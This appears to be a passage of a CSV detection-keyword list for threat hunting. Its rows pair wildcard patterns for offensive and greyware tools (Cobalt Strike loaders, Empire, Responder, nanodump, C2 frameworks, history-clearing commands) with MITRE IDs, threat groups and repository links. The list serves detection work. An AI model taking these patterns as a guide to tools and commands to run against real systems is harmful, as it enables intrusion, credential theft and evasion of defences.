-*linux-smart-enumeration.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linux-smart-enumeration-master*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*linWinPwn-*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*linWinPwn.*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lion2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lion2john-alt.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*LiquidSnake.exe*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*list_backdoors*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*List_Privileges /Process:powershell*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*list_tcppivot*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*list_tokens -u*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*ListAccountsWithSPN*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListAllUsers.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 
-*ListDescriptionContainsPass*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListDomainAdmins*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListDomainGroupsLocalAdmin*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*listen(58082* '0.0.0.0'*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*listen_http 0.0.0.0 8080 *.php operation1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*ListMetasploitPayloads*,offensive_tool_keyword,empire,Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ListNeverLoggedInAccounts*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListPasswordNeverExpire*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersLastPasswordChange*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersNoPasswordRequired*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersPasswordMustChange*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersPasswordNotChanged*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*litefuzz -lk -c*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz -s -a *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz* -l -c*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz.py *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation 
tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz\fuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*lkarlslund/Adalanche*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*lklekjodgannjcccdlbicoamibgbdnmi*,greyware_tool_keyword,Anonymous Proxy Vpn Browser,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*llbhddikeonkpbhpncnhialfbpnilcnc*,greyware_tool_keyword,ProxyFlow,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*llehsrewop*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed powershell,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*-llmnr -spn '*cifs* -secrets*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*LLMNR.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*LLMNRSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*llsrpc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*lmhash*aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*ln -sf /dev/null *bash_history*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. 
,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*lneaocagcijjdpkcabeanfpdbmapcjjg*,greyware_tool_keyword,Hub VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lnfdmdhmfbimhhpaeocncdlhiodoblbd*,greyware_tool_keyword,VPN PROXY MASTER,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lnk-generate.py --host * --type ntlm --output *.lnk*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lnx_keylogger.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*load aggressor script*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*load incognito*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*load kiwi*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Mimikatz,10,10,N/A,N/A,N/A,N/A -*load_sc.exe *.bin*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,0,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*load_ssp *.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Load-BeaconParameters*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 
- LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Load-Bof(*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*loaddll64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*loader/inject.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader/inject_local.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader/loader/loader.c*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth 